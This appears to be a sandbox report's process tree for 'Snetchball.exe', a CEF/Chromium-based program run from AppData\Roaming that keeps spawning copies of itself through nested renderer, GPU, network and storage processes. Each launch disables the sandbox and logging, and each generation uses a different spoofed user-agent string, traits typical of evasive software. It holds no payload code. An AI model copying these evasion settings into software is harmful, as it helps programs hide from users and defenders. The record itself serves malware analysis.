C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3132 --field-trial-handle=2888,i,1505237577704582794,4382369224944289541,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:810⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3652 --field-trial-handle=2888,i,1505237577704582794,4382369224944289541,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:810⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3660 --field-trial-handle=2888,i,1505237577704582794,4382369224944289541,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:110⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3668 --field-trial-handle=2888,i,1505237577704582794,4382369224944289541,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:110⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3820 --field-trial-handle=2888,i,1505237577704582794,4382369224944289541,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:110⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/127.1 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2716 --field-trial-handle=2720,i,7899382924243282962,13076382280378192388,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:213⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/127.1 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2968 --field-trial-handle=2720,i,7899382924243282962,13076382280378192388,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:813⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/127.1 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3396 --field-trial-handle=2720,i,7899382924243282962,13076382280378192388,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:813⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/127.1 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3504 --field-trial-handle=2720,i,7899382924243282962,13076382280378192388,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/127.1 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3520 --field-trial-handle=2720,i,7899382924243282962,13076382280378192388,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2836 --field-trial-handle=2840,i,18341057827219489979,11398264284562901908,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:216⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3152 --field-trial-handle=2840,i,18341057827219489979,11398264284562901908,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:816⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3300 --field-trial-handle=2840,i,18341057827219489979,11398264284562901908,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:816⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3648 --field-trial-handle=2840,i,18341057827219489979,11398264284562901908,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.2592.56 Safari/537.36 anonymized by Abelssoft 862212590" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2788 --field-trial-handle=2816,i,14094349262324036848,11120582117319130356,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:219⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.2592.56 Safari/537.36 anonymized by Abelssoft 862212590" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3104 --field-trial-handle=2816,i,14094349262324036848,11120582117319130356,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:819⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.2592.56 Safari/537.36 anonymized by Abelssoft 862212590" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3620 --field-trial-handle=2816,i,14094349262324036848,11120582117319130356,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:819⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.2592.56 Safari/537.36 anonymized by Abelssoft 862212590" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3636 --field-trial-handle=2816,i,14094349262324036848,11120582117319130356,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.108 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2836 --field-trial-handle=2840,i,17170385081353243848,10565764230083949368,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:222⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.108 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3112 --field-trial-handle=2840,i,17170385081353243848,10565764230083949368,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:822⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.108 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3152 --field-trial-handle=2840,i,17170385081353243848,10565764230083949368,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:822⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.108 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3644 --field-trial-handle=2840,i,17170385081353243848,10565764230083949368,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:122⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.108 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3648 --field-trial-handle=2840,i,17170385081353243848,10565764230083949368,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:122⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.2592.56 Safari/537.36 anonymized by Abelssoft 862212590" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3644 --field-trial-handle=2816,i,14094349262324036848,11120582117319130356,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.2592.56 Safari/537.36 anonymized by Abelssoft 862212590" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4392 --field-trial-handle=2816,i,14094349262324036848,11120582117319130356,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3668 --field-trial-handle=2840,i,18341057827219489979,11398264284562901908,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4244 --field-trial-handle=2840,i,18341057827219489979,11398264284562901908,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
-
-
